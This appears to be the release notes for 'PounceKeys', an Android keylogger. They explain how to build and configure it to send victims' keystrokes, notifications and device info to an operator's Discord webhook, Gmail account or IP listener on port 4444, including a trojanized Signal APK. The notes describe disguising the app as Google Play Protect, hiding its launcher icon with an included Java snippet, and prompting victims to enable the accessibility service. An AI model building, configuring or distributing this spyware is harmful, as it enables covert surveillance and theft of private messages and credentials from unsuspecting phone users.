Releases: NullPounce/pounce-keys
I decompiled it for your as it takes a while, so just make the 2 line edits in the 1 file and build with the apktool gui
------------NEW BUFFER IS 500!------------
Use: Signal-Android-play-prod-universal-debug-6.47.3.apk
decompile with (it's over 20 DEX files give it time) open in IDE and search and replace for
"paste in your webhook"
then compile with the same program. (it's inside of MessageSender.smali
if your a notepad kinda person or just want it simple: edit this file in the decompiled source
notes app forked from
This release uses Discord
Download Decompiled.rar and extract the decompiled apk folder
next use your IDE "Visual Studio" and search in all project files for a search and replace all for "INSERT-YOUR-DISCORD-WEBHOOK-HERE"
this file can be found here:
it's in their to replace two times, line 21 and 81
PounceKey's Builder's [Discord] [Gmail] [IP]
March 16th 2024 PounceKeysBuilder_2.0.rar
This new Builder has been made with Python Eel "it's like electron but for python"
You will need a chrome based browser and JDK19 (Windows)
this release includes the new play protect Gif as the GUI.
Discord Buffer = 200 "200 key events/presses"
IP Buffer = 75
Gmail Buffer = 200 "so every 200 typed keys, going to 300 broke it.... maybe low memory/LogCat"
you must have python and java installed.
Example: To run: ""
in powershell do:
python -m PounceKeys-Discord
for Linux use: ""
above are examples, download the one you want, ip,gmail,discord and use its respective python file for building.
do not have spaces in your path when building.
ip version uses port 4444
March 16th 2024 3.0
Multi Device support "appends/adds the device model/manufacturer to every log message"
New GUI replicating a google play protect scan and a 3rd alert to enable the service that's a pop up.
hidden icon up to android 13 instead of only 9
notifications are logged and sent again
system info sent on service enable
"should" now alert user to enable the service
updated the icon and text "general cleanup"
buffer is 200, apk's ending in 999 have a buffer of 999
App icon is now stealth "hidden from home and launcher screen" up to Android 13 instead of only version 9. (12.1 not vuln)
- tested and working Android 5-13 (version 12.0 keylogs but 12.1 does not, 12.1 can get a sys info email, 14 untested.)
Now sends "logs" notifications again, it is tied in sync into the typing buffer.
Now sends system info on service enable. (soon as the accessibility service is enabled the email is sent "avoiding testing")
A drop down notification and a toast message will now alert the user to enable the service
- using the stealth version disables this (may not work on all phones "let me know in Discord")
Updated the icon to replicate Google Play Protect and changed names from BatteryHealthService to GooglePlayProtectService
- moved the java files up a folder from the BatteryHealth folder "deleted" up to the com folder making the top entry "package com;"
Opening the app just brings up the settings (or says app not installed and won't open)
this was a huge pain and learning curve, had to deal with an api bug but its fixed
works in 2023 using app password method thanks to @ 2picodin9 for the suggestion
this has a buffer of 200 to avoid spam
open APK Editor and open the apk or if in android studio
In AS it will show as follows:
private static final String USERNAME = "[email protected]";
private static final String APP_PASSWORD = "APP-PASSWORD";
private static final String RECIPIENT_EMAIL = "[email protected]";
private static final int MAX_BUFFER_SIZE = 200;
replace "APP-PASSWORD" with the 16 character long app password from your 2FA enabled google account
then replace "[email protected]" with your email in the username and recip lines
In APK Editor do a search and replace for:
[email protected]
with your info and then just save it, a search and replace as its everywhere in apk edit
March 16th 2024 3.0
Multi Device support "appends/adds the device model/manufacturer to every log message"
New GUI replicating a google play protect scan and a 3rd alert to enable the service that's a pop up.
hidden icon up to android 13 instead of only 9
notifications are logged and sent again
system info sent on service enable
"should" now alert user to enable the service
updated the icon and text "general cleanup"
buffer is 999
no need to open any ports, use your own discord channel as a listener
open APK Editor or Android Studio and open the MessageSender.smali or Java file
-located in:
we need to replace:
"paste in your webhook"
TWO different times (yes paste in your bot url twice over whats inside)
and find two instances of it and paste in your bot url over it in the two sections in this one file
if inside AS you only need to change it once you'll see
click the gear icon on your channel and click edit channel then integrations to create a webhook bot then copy its url and your all set.
march 16th 2024 new update
default port is 4444 no need to set. the numbers in the names are in relation to the buffer size
added this snippet to end of
// Hide the launcher icon
PackageManager p = getPackageManager();
ComponentName componentName = new ComponentName(this, MainActivity.class);
p.setComponentEnabledSetting(componentName, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
and then updated the manifest like so
<activity android:name=".MainActivity"
this gives us our old behavior which makes it not open the app at all on all android versions and hides from the
launcher android 9 and bellow.
Pounce Keys 2.0 APK "project ip hardcode"
Pounce keys 2.0 release notes
this version
hard codes the ip
use APK Editor Studio to open the apk and search for and replace with your ip in the 2 smali files
mainactivity and messagesender then save the apk and install and use the listener.
keylogger apk's and java listener in jar, exe
hidden and normal apk
made a custom listener in java, source files in project, (if you want to look at the java code, make edits or compile yourself
for windows extract the whole folder and just run the exe
open a terminal and type
java -jar MessageListener.jar for the java version of the listener
only in rar files as the icon or config file is separate at the moment
jar version should work in windows and linux
jdk 19